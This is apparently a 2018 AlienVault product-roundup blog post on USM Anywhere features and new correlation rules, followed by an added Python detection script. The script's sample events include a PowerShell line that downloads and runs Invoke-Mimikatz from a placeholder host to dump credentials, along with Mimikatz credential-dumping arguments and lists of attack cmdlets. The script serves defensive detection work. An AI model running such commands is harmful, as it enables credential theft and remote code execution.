AlienVault Monthly Product Roundup April 2018


We are continuously making improvements and rolling out new features to USM Anywhere to help your team be more effective at detecting and responding to threats. You can keep up with USM Anywhere releases by reading our release notes in the AlienVault Product Forum. Here is a roundup of the highlights from our April 2018 releases:

Go Threat Hunting with OTX Endpoint Threat Hunter™:

Okay, so technically this one is not a USM Anywhere feature, but it is very cool (and free!) and worth the mention here. Earlier this month, we launched OTX Endpoint Threat Hunter™, a new free service in Open Threat Exchange® (OTX™) that allows anyone to hunt for malware and other threats on their endpoints using the indicators of compromise (IOCs) catalogued in OTX. It's powerful, easy to use, and, yes, completely free.

Introducing our not-so-secret Agent, man:

OTX Endpoint Threat Hunter is powered by the AlienVault Agent—a lightweight and adaptable endpoint agent based on osquery. We plan to extend the use of the AlienVault Agent in USM Anywhere and have already begun to invite USM Anywhere users to request early access to the AlienVault Agent through the product, under the new Agents page. Participation in early access is limited.

The AlienVault Agent provides deep visibility into your environment with File Integrity Monitoring and event forwarding on Windows and Linux endpoints. It is simple and fast to install and has a small footprint. With the AlienVault Agent, you can get to endpoint security insights quickly, without the cost and complexity of a standalone endpoint security solution. We’ll announce general availability later this year, so stay tuned!

Show me the data sources:

When it comes to data collection for threat detection, the first and most important thing to know is whether your data sources are supported and how. To make it easier and faster to navigate data collection in USM Anywhere, we added a new Data Sources menu to the main navigation. This menu consolidates all the different ways USM Anywhere collects data from your environment: Sensors, Agents, and Integrations. The new Integrations page includes tabs for Plugins, Sensor Apps, and AlienApps, which now includes the Forensics and Response App. In addition, we streamlined the existing Settings menu, again making USM Anywhere simple and fast to use.

New and improved data sources:

Speaking of data sources, we regularly add support for new data sources and improve our methods of collection, parsing, and normalization for existing data sources. You can always find our full list of data sources, including AlienApps and plugins, here.

If you don't see a data source here that you want supported, fear not. AlienVault will build support for most commercially available products at no additional charge. You can submit a request here.

This month, we added or updated the following data sources in USM Anywhere:

Threat Intelligence delivered faster than your Amazon Prime order

Last, but never least, the AlienVault Labs Security Research Team delivers continuous threat intelligence updates to USM Anywhere every single day. This automated, actionable (read: no effort required on your part) threat intelligence keeps your USM Anywhere deployment humming against emerging and evolving threats as they unfold in the wild.

In addition to all the data sources listed above, the AlienVault Labs Security Research Team delivered the following threat intelligence to the USM Anywhere platform this month:

New Correlation Rules

New correlation rule to detect PowerLessShell

New correlation rule to detect common Powershell attack frameworks

New correlation rule to detect Java process spawning

New correlation rule to detect known Mimikatz module in process argument
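As an added illustration (not AlienVault's rule logic, which this post does not describe), the Python below sketches process-creation detections in the spirit of the four rules named above and runs them over a handful of constructed Sysmon-style events. The indicator lists, the "project file in a user-writable directory" heuristic for the MSBuild check, and the sample events are this example's own assumptions; PowerLessShell itself is a real tool that executes PowerShell code through MSBuild inline tasks so that no powershell.exe process is created, which is why that check keys on msbuild.exe rather than on PowerShell.

```python
"""Illustrative process-creation detections (added example, not AlienVault code).

Each detector takes one process-creation record (Sysmon event 1 / Windows 4688
style) and returns True when it matches. Indicator sets are assumptions."""
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str   # full path of the parent process image
    image: str          # full path of the created process image
    command_line: str   # command line of the created process


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# Assumed indicators: well-known Mimikatz module prefixes as they appear in arguments.
MIMIKATZ_MODULES = ("sekurlsa::", "lsadump::", "privilege::debug", "kerberos::", "token::")
# Assumed indicators: cmdlet names from common PowerShell attack frameworks.
PS_FRAMEWORK_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"\bInvoke-Mimikatz\b", r"\bInvoke-Shellcode\b", r"\bInvoke-ReflectivePEInjection\b",
    r"\bInvoke-Kerberoast\b", r"\bInvoke-AllChecks\b", r"\bInvoke-PSInject\b",
)]
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "sh", "bash"}
# Assumed heuristic: a build project fed to MSBuild from a user-writable directory.
USER_WRITABLE = re.compile(r"(\\|/)(temp|tmp|appdata|downloads|public)(\\|/)", re.IGNORECASE)
PROJECT_FILE = re.compile(r"\.(csproj|proj|xml)\b", re.IGNORECASE)


def mimikatz_module_in_args(ev: ProcEvent) -> bool:
    """Flags Mimikatz module syntax in the arguments, whatever the binary is named."""
    cl = ev.command_line.lower()
    return any(m in cl for m in MIMIKATZ_MODULES)


def powershell_attack_framework(ev: ProcEvent) -> bool:
    """Flags PowerShell hosts invoking known offensive-framework cmdlets."""
    if basename(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return False
    return any(p.search(ev.command_line) for p in PS_FRAMEWORK_PATTERNS)


def java_spawning_shell(ev: ProcEvent) -> bool:
    """Flags a Java runtime spawning a command interpreter (assumed reading of the rule)."""
    return basename(ev.parent_image) in {"java.exe", "javaw.exe", "java"} and basename(ev.image) in SHELLS


def powerlessshell_style_msbuild(ev: ProcEvent) -> bool:
    """Flags msbuild.exe building a project file from a user-writable location."""
    if basename(ev.image) != "msbuild.exe":
        return False
    return bool(USER_WRITABLE.search(ev.command_line)) and bool(PROJECT_FILE.search(ev.command_line))


RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("Mimikatz module in process argument", mimikatz_module_in_args),
    ("Common PowerShell attack framework", powershell_attack_framework),
    ("Java process spawning a shell", java_spawning_shell),
    ("PowerLessShell-style MSBuild execution", powerlessshell_style_msbuild),
]


def run_detections(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Returns (event index, rule name) for every rule that fires on every event."""
    return [(i, name) for i, ev in enumerate(events) for name, fn in RULES if fn(ev)]


# Constructed sample events (not real telemetry); the last three are benign.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Users\bob\AppData\Local\Temp\svchost.exe",
              r'svchost.exe "privilege::debug" "sekurlsa::logonpasswords" exit'),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString("
              "'http://example.invalid/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\""),
    ProcEvent(r"C:\Program Files\Java\jre1.8.0_171\bin\java.exe", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c whoami"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
              r"MSBuild.exe C:\Users\bob\AppData\Local\Temp\build.csproj"),
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent(r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", r"MSBuild.exe C:\src\app\app.csproj /t:Build"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command Get-Process"),
]

if __name__ == "__main__":
    for idx, rule in run_detections(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} <- {SAMPLE_EVENTS[idx].command_line}")
```

Note that the first event is a renamed Mimikatz binary: matching on the module syntax in the arguments catches it where an image-name rule would not, which is the point of the "in process argument" rule name. The MSBuild heuristic is deliberately narrow; a production rule would also consider parent process and signer, and would tune the path list to the environment.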

About the Author: Danielle Russell, AlienVault
Danielle is a Senior Product Marketing Manager at AlienVault, responsible for product messaging and positioning, go-to-market strategy, and sales enablement. Prior to AlienVault, Danielle held a marketing leadership position with an IT software company in the telecommunications industry. Danielle earned a B.S. in Life Sciences Communication from the University of Wisconsin.